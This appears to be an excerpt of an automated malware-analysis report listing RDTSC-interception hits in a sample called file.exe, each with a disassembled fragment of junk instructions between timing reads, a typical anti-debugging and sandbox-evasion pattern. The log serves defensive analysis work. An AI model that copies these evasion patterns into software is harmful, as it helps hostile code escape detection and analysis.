    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D7429 second address: 3D744E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007F18F0E36A67h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F18F0E36A53h 0x00000015 push edx 0x00000016 pop edx 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D75C8 second address: 3D75DC instructions: 0x00000000 rdtsc 0x00000002 jp 00007F18F0EA3E4Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D75DC second address: 3D75FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F18F0E36A52h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c js 00007F18F0E36A52h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D75FD second address: 3D7612 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F18F0EA3E46h 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jns 00007F18F0EA3E46h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D7612 second address: 3D761B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D761B second address: 3D761F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D7755 second address: 3D7759 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D7759 second address: 3D776F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F18F0EA3E4Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D776F second address: 3D7789 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F18F0E36A4Ch 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007F18F0E36A46h 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D7789 second address: 3D77C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F18F0EA3E57h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F18F0EA3E59h 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D7A22 second address: 3D7A26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D7A26 second address: 3D7A2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D7A2F second address: 3D7A34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D7A34 second address: 3D7A3F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F18F0EA3E46h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D7E8F second address: 3D7E95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3D7E95 second address: 3D7E9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F18F0EA3E46h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3DB24C second address: 3DB276 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F18F0E36A55h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F18F0E36A4Dh 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 361DF8 second address: 361E0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F18F0EA3E4Ah 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 361E0B second address: 361E0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 361E0F second address: 361E13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3DC9C3 second address: 3DC9C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 366D2C second address: 366D30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E1A24 second address: 3E1A51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F18F0E36A53h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jc 00007F18F0E36A4Ah 0x0000001b pushad 0x0000001c popad 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A1038 second address: 3A1046 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F18F0EA3E46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A10D7 second address: 3A111B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F18F0E36A48h 0x0000000c popad 0x0000000d xor dword ptr [esp], 100B9140h 0x00000014 push 00000000h 0x00000016 push ebp 0x00000017 call 00007F18F0E36A48h 0x0000001c pop ebp 0x0000001d mov dword ptr [esp+04h], ebp 0x00000021 add dword ptr [esp+04h], 0000001Ch 0x00000029 inc ebp 0x0000002a push ebp 0x0000002b ret 0x0000002c pop ebp 0x0000002d ret 0x0000002e push C61C107Bh 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A111B second address: 3A1122 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A1122 second address: 3A112C instructions: 0x00000000 rdtsc 0x00000002 jl 00007F18F0E36A4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A1271 second address: 3A1284 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], esi 0x00000008 add dword ptr [ebp+122D1D65h], esi 0x0000000e push eax 0x0000000f pushad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A1F51 second address: 3A1F57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E0DED second address: 3E0E05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 js 00007F18F0EA3E46h 0x0000000b push eax 0x0000000c pop eax 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jnp 00007F18F0EA3E46h 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E0E05 second address: 3E0E0F instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F18F0E36A46h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E1207 second address: 3E1212 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F18F0EA3E46h 0x0000000a pop eax 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E13AE second address: 3E13B8 instructions: 0x00000000 rdtsc 0x00000002 js 00007F18F0E36A4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 355F3F second address: 355F45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 355F45 second address: 355F49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 355F49 second address: 355F72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F18F0EA3E55h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F18F0EA3E50h 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 355F72 second address: 355F77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 355F77 second address: 355F7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 355F7D second address: 355FB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F18F0E36A4Bh 0x00000009 jl 00007F18F0E36A46h 0x0000000f popad 0x00000010 push ecx 0x00000011 jne 00007F18F0E36A46h 0x00000017 pop ecx 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pushad 0x0000001b pushad 0x0000001c jmp 00007F18F0E36A4Dh 0x00000021 pushad 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 355FB0 second address: 355FB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E609A second address: 3E609F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E61DD second address: 3E61E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E6954 second address: 3E695E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F18F0E36A46h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3E6C19 second address: 3E6C1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3EABC3 second address: 3EABED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F18F0E36A4Ch 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F18F0E36A58h 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3EABED second address: 3EABF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3EABF1 second address: 3EABF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3EA41C second address: 3EA427 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F18F0EA3E46h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3EA571 second address: 3EA577 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3EA577 second address: 3EA598 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F18F0EA3E58h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3EA598 second address: 3EA59E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3EA59E second address: 3EA5AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3EA719 second address: 3EA748 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F18F0E36A4Eh 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c jmp 00007F18F0E36A57h 0x00000011 push eax 0x00000012 pop eax 0x00000013 pop ecx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3ED063 second address: 3ED067 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3ECB2D second address: 3ECB54 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F18F0E36A46h 0x00000008 jmp 00007F18F0E36A59h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edi 0x00000010 pushad 0x00000011 popad 0x00000012 pop edi 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3ECB54 second address: 3ECB74 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F18F0EA3E46h 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F18F0EA3E50h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3ECB74 second address: 3ECB78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3ECB78 second address: 3ECB82 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F18F0EA3E46h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3ECB82 second address: 3ECBA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F18F0E36A59h 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A1827 second address: 3A182B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A182B second address: 3A182F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A182F second address: 3A18B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push esi 0x0000000b call 00007F18F0EA3E48h 0x00000010 pop esi 0x00000011 mov dword ptr [esp+04h], esi 0x00000015 add dword ptr [esp+04h], 00000019h 0x0000001d inc esi 0x0000001e push esi 0x0000001f ret 0x00000020 pop esi 0x00000021 ret 0x00000022 jmp 00007F18F0EA3E4Eh 0x00000027 call 00007F18F0EA3E4Eh 0x0000002c sub edx, dword ptr [ebp+122D3900h] 0x00000032 pop ecx 0x00000033 mov ebx, dword ptr [ebp+1248087Ah] 0x00000039 movsx edx, bx 0x0000003c mov edi, dword ptr [ebp+122D2433h] 0x00000042 add eax, ebx 0x00000044 jmp 00007F18F0EA3E59h 0x00000049 sub dword ptr [ebp+122D2620h], ebx 0x0000004f nop 0x00000050 pushad 0x00000051 push eax 0x00000052 push edx 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A18B1 second address: 3A18B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A18B5 second address: 3A18BE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A18BE second address: 3A1911 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a jmp 00007F18F0E36A53h 0x0000000f pop eax 0x00000010 nop 0x00000011 pushad 0x00000012 mov di, 825Dh 0x00000016 popad 0x00000017 push 00000004h 0x00000019 mov dword ptr [ebp+12465F0Eh], eax 0x0000001f nop 0x00000020 pushad 0x00000021 jmp 00007F18F0E36A4Eh 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F18F0E36A54h 0x0000002d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F283D second address: 3F2841 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F2841 second address: 3F2855 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnc 00007F18F0E36A4Ch 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F29C8 second address: 3F29CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F33DB second address: 3F33E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F33E1 second address: 3F33F8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F18F0EA3E4Bh 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F33F8 second address: 3F33FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F688A second address: 3F6894 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F18F0EA3E46h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F6894 second address: 3F689A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F689A second address: 3F68B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F18F0EA3E4Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F18F0EA3E4Fh 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F6A07 second address: 3F6A11 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F18F0E36A46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F6A11 second address: 3F6A23 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F18F0EA3E4Ah 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F706D second address: 3F7080 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F18F0E36A46h 0x0000000a popad 0x0000000b push ecx 0x0000000c ja 00007F18F0E36A46h 0x00000012 pop ecx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3FA4AC second address: 3FA4B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jno 00007F18F0EA3E46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3FA4B8 second address: 3FA4BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F9D08 second address: 3F9D12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F9D12 second address: 3F9D18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F9D18 second address: 3F9D29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 je 00007F18F0EA3E46h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 400658 second address: 40065E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 40065E second address: 400664 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 40141E second address: 401424 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 401FF9 second address: 401FFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 401FFD second address: 402010 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F18F0E36A4Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push ecx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 40722E second address: 407234 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 407234 second address: 407238 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 407238 second address: 407250 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F18F0EA3E4Eh 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 407250 second address: 407268 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F18F0E36A46h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 40652F second address: 406540 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 jg 00007F18F0EA3E46h 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4067E5 second address: 4067EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4067EB second address: 406811 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F18F0EA3E55h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jns 00007F18F0EA3E46h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
